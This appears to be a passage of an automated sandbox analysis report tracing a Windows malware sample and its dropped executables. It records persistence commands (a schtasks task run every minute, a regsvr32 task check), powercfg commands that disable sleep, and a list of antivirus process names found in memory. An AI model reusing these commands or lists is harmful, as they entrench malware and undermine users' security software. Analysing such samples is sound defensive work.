                          Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }"
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe"
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe Process created: C:\Windows\System32\svchost.exe svchost.exe
                          Source: skotes.exe, skotes.exe, 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: Program Manager
                          Source: e44fda3216.exe, 0000000B.00000002.3305605418.0000000000E51000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: ~Program Manager
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 5_2_0041DD91 cpuid 5_2_0041DD91
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1034109001\bed2608720.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Queries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe VolumeInformation
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exeQueries volume information: C:\Users\user\AppData\Roaming\NzL6O1Q.exe VolumeInformation
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00E6CBEA
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                          Lowering of HIPS / PFW / Operating System Security Settings

                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                          Source: C:\Users\user\AppData\Local\Temp\pcqxl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                          Source: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avguard.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 360safe.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ashdisp.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bullguard.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwengine.exe
                          Source: svchost.exe, 00000035.00000002.3317977394.0000022087AF0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538212391.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2538561130.0000022087AEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2524405959.0000022087AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k7tsmngr.exe
